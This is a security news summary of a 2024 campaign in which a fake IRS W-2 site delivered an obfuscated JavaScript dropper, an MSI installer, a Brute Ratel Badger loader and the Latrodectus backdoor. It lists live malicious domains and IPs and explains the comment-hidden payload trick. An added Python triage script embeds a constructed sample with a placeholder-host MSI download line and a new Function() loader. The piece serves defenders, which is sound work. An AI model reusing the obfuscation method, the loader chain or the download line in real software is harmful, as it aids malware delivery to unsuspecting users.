Summary: A malicious campaign launched on June 21, 2024, involved the distribution of a JavaScript file that executed an MSI installer, leading to the installation of the Brute Ratel Badger and the Latrodectus backdoor, allowing remote control and data theft. The attack utilized a fake IRS website to lure victims and employed sophisticated obfuscation techniques to evade detection.
Threat Actor: Unknown | Brute Ratel
Victim: General public | IRS
Key Points:
- The campaign involved a malicious JavaScript file that downloaded and executed MSI installers, leading to the installation of stealthy malware.
- Threat actors used a fake IRS website to trick users into solving a CAPTCHA, which initiated the download of the malicious script.
- Obfuscation techniques were employed to hide malicious code within comments, enhancing the malware’s ability to evade detection.
- The malware included a valid authentication certificate to increase its legitimacy and deceive users.
- Multi-stage malware infection was confirmed, with connections to multiple command-and-control domains for further payload delivery.
A malicious campaign emerged on June 21, 2024, distributing a JavaScript file hosted on grupotefex.com, which executes an MSI installer, subsequently dropping a Brute Ratel Badger DLL into the user’s AppData.
The Brute Ratel command-and-control framework then downloads and deploys the stealthy Latrodectus backdoor, which gives the threat actors remote control of the host, the ability to steal data, and a channel to deliver further payloads.
Zscaler ThreatLabz independently verified Brute Ratel’s involvement as an initial access broker for the Latrodectus malware family on June 23.
An attacker leveraged Bing search results to redirect users from a lookalike domain (appointopia.com) to a fake IRS website (hxxps://grupotefex.com/forms-pubs/about-form-w-2/).
Visiting the site presented a CAPTCHA challenge. Solving the seemingly innocuous CAPTCHA downloaded a malicious JavaScript file (Form_Ver-*.js) hosted on a Google Firebase storage bucket, which initiated the next stage of the attack.
Analysis of the JS file `Form_ver-14-00-21.js` revealed an obfuscation technique in which the threat actors concealed the malicious code inside seemingly innocuous comments.
The file used a ScriptHandler class to extract the lines beginning with ‘/////’ and execute them with `new Function()`. Hiding the payload in comments keeps it out of the visible code, inflates the file size, and helps the script evade antivirus detection.
Additionally, the file’s inclusion of a valid authentication certificate enhances its legitimacy, emphasizing the threat actor’s intent to deceive.
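As an added example (not code from the article, the vendors cited, or the analysed sample), a triage helper that recovers the lines hidden behind the ‘/////’ marker and flags suspicious strings without executing anything. The sample script, the placeholder host and the indicator list are constructed for the example.

```python
"""Triage helper for JScript samples that hide code in '/////' comment lines."""

HIDDEN_PREFIX = "/////"  # marker the article reports the ScriptHandler class looked for

# Strings worth flagging in the visible or recovered code (constructed list).
INDICATORS = ("new Function(", "eval(", "ActiveXObject", ".msi", "WScript.Shell")

# Constructed sample in the same shape as the reported file: benign-looking
# filler comments, two hidden lines, and a loader that hands the recovered
# text to new Function(). Host name is a placeholder, not a real indicator.
SAMPLE_JS = """\
// Form verification helper - build 14.00.21
// Copyright (c) Example Corp. All rights reserved.
function validateForm(f) {
    return f && f.elements.length > 0;
}
///// var target = "http://PLACEHOLDER-HOST/BST.msi";
// Filler comment that pads the file to inflate its size.
// Filler comment that pads the file to inflate its size.
///// installPackage(target);
var run = new Function(hiddenCode);
"""


def extract_hidden_code(js_text):
    """Return the payload text of every line whose first token is '/////'."""
    hidden = []
    for line in js_text.splitlines():  # handles CRLF line endings too
        stripped = line.lstrip()
        if stripped.startswith(HIDDEN_PREFIX):
            hidden.append(stripped[len(HIDDEN_PREFIX):].strip())
    return hidden


def triage(js_text):
    """Summarise a sample: comment density, hidden lines and flagged strings."""
    lines = js_text.splitlines()
    comment_lines = sum(1 for l in lines if l.lstrip().startswith("//"))
    hidden = extract_hidden_code(js_text)
    # The hidden text is part of js_text, so one scan covers both.
    indicators = [s for s in INDICATORS if s in js_text]
    return {
        "total_lines": len(lines),
        "comment_ratio": round(comment_lines / len(lines), 2) if lines else 0.0,
        "hidden_lines": len(hidden),
        "recovered_code": "\n".join(hidden),
        "indicators": indicators,
        "suspicious": bool(hidden) and bool(indicators),
    }
```

A high comment ratio combined with any recovered ‘/////’ lines is the signal to pull the sample for manual review.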
The sole purpose of the `Form_ver-14-00-21.js` script is to download and execute MSI packages from specified URLs: it retrieved an MSI named “BST.msi” from the IP address 85.208.108.63 and launched its installation.
A similar incident on June 25th involved a different script downloading another MSI, “neuro.msi,” from a closely related IP, 85.208.108.30, indicating a single campaign delivering identical malicious payloads.
Rapid7 analyzed an MSI file named neuro.msi and found it contained a cabinet archive (disk1.cab) with a DLL named capisp.dll.
The MSI installer also included a custom action that dropped capisp.dll into the user’s AppData\Roaming folder and executed it with rundll32.exe, calling the export named “remi”.
Analysis of capisp.dll revealed a multi-stage infection chain: the DLL, associated with VLC, contains an encrypted resource that is decrypted with a hardcoded XOR key.
The decrypted data is a loader for a packed Brute Ratel Badger (BRC4) payload. The Badger connects to multiple C2 domains and downloads the Latrodectus malware, which is injected into Explorer.exe and communicates with several additional C2 URLs.
Source: https://gbhackers.com/hackers-target-w2-form-searchers